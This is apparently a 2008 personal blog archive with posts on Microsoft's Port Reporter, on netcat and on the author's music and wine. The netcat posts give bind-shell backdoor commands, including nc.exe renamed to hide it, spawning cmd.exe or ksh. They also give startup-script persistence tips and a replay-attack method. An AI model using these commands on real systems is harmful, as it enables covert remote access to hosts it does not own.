Thursday, 28 August 2008

The "Port Reporter" tool by Microsoft.

The Microsoft Port Reporter tool logs TCP and UDP ports as they are opened and closed. This makes a log that may be used to see what has occured on a system over time. This can be particularly useful in determining Malware actiuons over time and even in determining if a host has been compromised.

Both Windows Server 2003 and Windows XP systems support the port reporter service. It can be used to record the following information:

  • The ports that are used
  • The processes that use the port
  • Whether a process is a service
  • The modules that a process loaded
  • The user accounts that run a process

Port Reporter will (if available) create its log files in the folder:

The service creates several logs - these inclue the following:

  • The PR-INITIAL log file holds information collected covering the ports, processes, and modules that run on the host when the Port Reporter service is initiated.
  • The PR-PORTS log holds information concerning any TCP and UDP port activity on the system in a CSV format. It holds the following fields - date,time,protocol,local port,local IP address,remote port,remote IP address,PID,module,user context (this is slightly different on Windows 2000).
  • The PR-PIDS log holds detailed data that covers the ports, processes, related modules, and the user-account that the process is running as.

The user context that each process is running under is also logged.

This is a great free tool from Microsoft.

Wednesday, 27 August 2008

Netcat - Last but not least

Netcat is also able to be used as a Forwarder and Relay.

I am not going to go into detail here, but if you think about it, there is no reason why a single netcat listener is the end of what you can do. Chaining netcat can allow it to pass multiple layers and systems. In Pen-tests, Red Teaming and even on the darker side of the fence, this techniques os used to "drill" through firewalls and security systems.

More than this, netcat can chain across different protocols. It is possible to pipe one connection type into another. This is, a connection to DNS (UDP 53) can be changed to HTTP (TCP 80) etc.

All of this just touchers the surface of what netcat does. I would suggest that you search and find out more. Fell free to post comments - there are always more uses of netcat and the other readers would love to read yours.

Naughtier Netcat

Netcat can also be used as a backdoor into a system and a remote shell.
Netcat as a Trojan

It seems all too easy....

  • @echo off winsys.exe-L -d -p 139 -t -e cmd.exe

Note that the about command "winsys.exe" is really just "nc.exe" on our Windows host, buit we have simply renamed it. In the process list we have something that is less likely to be discovered.

Once you have run the script on the host that you wish to Trojanise, use telnet to connect to it as follows:

  • #nc-v [ipaddressof target] [port]

On UNIX we can do something similar. The following starts netcat in listen mode.

  • #nc -l -p [port] -e /bin/ksh

Of course, you can listen on either TCP or UDP. In fact, adding this line to a start-up script could allow an attacker to selectively send connections to a valid service or the "Trojan" (see TCPWrappers).

For instance, if an attacker gets shell access through a DNS vulnerability with BIND, the attacker could load a netcat startup and allow future access whilst patching the issue to stop furether attacks (and keep the server for themself).

Even simple tools can be used in both positive and negative ways.

Naughty, Naughty Netcat

Netcat can be used as a replay attack engine. It works well for this purpose and is simple to use. The first part is to actually collect the information stream (the data) that you want to replay. This can be done by using another tool to create the stream or just capture (tcpdump or wireshark) a stream and alter the parts that do not fit.

This is - change the times, IP addressing, desitinations, values etc to make the captured stream suit what you want.

To replay the data, netcat in client mode will suffice:
$ cat file.capture.bin nc [destination IP] [port]

or even:
$ nc [destination IP] [port] <>

Either will work.

Either netcat in listen mode, tcpdump, wireshark or tcprelay can be used to make the initial capture.

TCPRelay works better for this task, but netcat just looks cooler (in a geek sense).

Tuesday, 26 August 2008


Tonight I am not studying (in the general sense). This is a change for me.

I have a bottle of wine (a bottle of well aged Penfolds Cabernet Sauvignon (1995 vintage). How to put it, Plum red. with a nose of tobacco leaf, cedar and capsicum. A light vanilla with a slight aftertaste. The tannins are mild and it is drinking well now. I do not see much more time for this wine. It is at to just past its peak and needs to be drunk now).

I have a mixed vegetable lassangne with a rich capisum sauce and nutmeg bechmel.

I have Handel's Messiah sung by the Oxford New College Choir. I listened to George Frideric Handel prior to this with the piece Rinaldo. This is to be followed by Dave Brubeck's album, "Jazz: Red Hot and Cool". Later, Frank Sinatra's album - In The Wee Small Hours.

Later tonight I leave the computer to download Java Security courses, my latest SANS courses and MP3s and a number of books I have purchased online. Later I will watch a movie - Ruins (2007) that I purchased today to watch on the screen with my wife.

Once in a while even I have a break from study and writing.

Tomorrow - back to the DNS paper, my statistics dissertation and work. I have a cryptocurrency paper out soon. Twenty years. Triple entry book keeping. BDO was good for something.

Tomorrow, Wolfgang Amadeus Mozart. Which piece, well that is still undecided.

Monday, 25 August 2008

My Latest Plan

Unlike most people, I have realised the value of time from when I was a youth. My latest adition of goals is to listen to the 90,000 most influential pieces of music throughout history (as judged by myself).

Tonight I have Hildegard Von Bingen playing. In this case Canticles Of Ecstasy. This consists of the following works:

  • O Vis Aeternitatis
  • Nunc Aperuit Nobis
  • Quia Ergo Femina Mortem Instruxit
  • Cum Processit Factura Digiti Dei
  • Alma Redemptoris Mater
  • Ave Maria, O Auctrix Vite
  • Spiritus Sanctus Vivificans Vite
  • O Ignis Spiritus Paracliti
  • Caritas Habundat In Omnia
  • O Virga Mediatrix
  • O Viridissima Virga, Ave
  • Instrumentalst├╝ck Instrumental Piece
  • O Pastor Aminarum
  • O Tu Suavissima Virga
  • O Choruscans Stellarum
  • O Nobilissima Viriditas
This is a 20 year plan.

Hildegard of Bingen was born in 1084 and at 14 entered a Benedictine nunnery outside of Worms (the Rhineland). She became the Abbess in 1136 and subseqently moved her order to Rupertsberg - outside of Bingen.

She composed 77 vocal works (including 43 Antiphons) collectively known as the Symphonia armonie celestium revelationum.

This is a truely mystic collection of vocal works. A great reflective collection.

On top of this I alsolistened to Symphony No. 8 from Dimitri Shostakovich. This was the 1988 preformance conducted by Yevgeny Mravinsky. This is reflective, bitterly powerful and emotionally transcandent. This is a dark and brooding work reflecting a true depth of emotion and experiances I can not begin to comprehend.

Yet in it lies hope.

George Frideric Handel - Messiah (1742)